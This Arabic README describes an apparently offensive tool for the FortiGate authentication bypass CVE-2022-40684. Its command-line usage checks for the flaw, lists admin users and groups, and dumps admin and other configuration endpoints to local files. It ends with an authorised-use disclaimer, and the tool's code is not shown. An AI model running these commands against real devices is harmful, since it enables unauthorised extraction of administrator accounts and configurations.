
أداة تقييم FortiGate CVE-2022-40684 لتعداد المستخدمين، تفريغ التهيئة، واختبارات المختبر.
تتيح هذه الأداة لمتخصصي الأمن تحديد والتحقق من التعرض لـ CVE-2022-40684 في أجهزة FortiGate من خلال التفاعل مع نقاط نهاية CMDB API المكشوفة.
تدعم تعداد المستخدمين الإداريين ومجموعات المستخدمين واستخراج التهيئة الانتقائي للتحليل في بيئات خاضعة للرقابة.
تثبيت التبعيات: pip3 install -r requirements.txt
التحقق من الثغرة:
python3 fortigate_tool.py -t <target>
تعداد المستخدمين:
python3 fortigate_tool.py -t <target> --enum
تفريغ نقطة نهاية محددة:
python3 fortigate_tool.py -t <target> --dump /api/v2/cmdb/system/admin
تفريغ تهيئات هامة متعددة:
python3 fortigate_tool.py -t <target> --dump-all
يتم تخزين التهيئات المفروغة محليًا في: fortigate_dump/
هذه الأداة مخصصة للأغراض التعليمية واختبار الأمن المصرح به فقط. لا تستخدم هذه الأداة على أنظمة دون إذن صريح. المؤلف غير مسؤول عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.